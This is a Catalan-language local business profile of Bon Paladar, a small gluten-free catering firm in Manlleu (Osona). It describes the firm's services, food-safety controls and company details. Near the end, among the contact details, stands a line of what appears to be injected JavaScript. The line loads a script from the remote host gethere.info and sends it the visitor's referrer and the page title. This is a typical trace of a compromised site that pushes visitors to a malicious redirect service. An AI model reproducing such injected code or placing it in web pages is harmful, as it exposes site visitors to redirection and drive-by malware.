Bon Paladar

Activitat, antecedents i evolució de l’empresa

Bon Paladar té 5 vies d’acció:

  •   Servei de càtering.
  •   Gestió de cuines: compres i personal.
  •   Menjadors escolars i centres de dia: educació alimentària nutricional dels nens i adolescents.
  •   Assessorament dietètic: estudi del client a partir del qual dissenyem un menú personalitzat.
  •   Menjar sense gluten

Els nostres  valors són: vocació de servei, qualitat i seguretat alimentària.

Per tal de garantir-los, tenim instaurat un sistema personalitzat d’Anàlisis de Perill i Punts de Control Crítics (APPCC) i fem periòdicament analítiques microbiològiques dels plats, superfícies de treball i utensilis utilitzats per a l’elaboració del menjar.

A més de les bones pràctiques en manipulació, fem un control de la traçabilitat (des de la recepció de la matèria primera fins a l’expedició del producte acabat) i controls diaris de temperatura, de clor de l’aigua i de la neteja.

Elements diferencials / Valor afegit

El nostre objectiu és fer gaudir les persones celíaques de qualsevol plat que desitgin i ampliar els punts de venda dels productes sense gluten per tal de facilitar-los la vida social.

Volem aconseguir una carta a bars i restaurants a un preu més assequible per al consumidor final.

Què aporta l’empresa a Manlleu

Som pioners a la comarca d’Osona en l’elaboració i distribució de menjar preparat sense gluten, donant suport també a les empreses que es dediquen a la restauració col·lectiva.

Empresa: Bon Paladar SCP
Activitat/Sector: Alimentació
Nombre de treballadors: 3
Data de creació: 18/12/2007
Web: www.bonpaladar.com

Correu electrònic: [email protected]

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa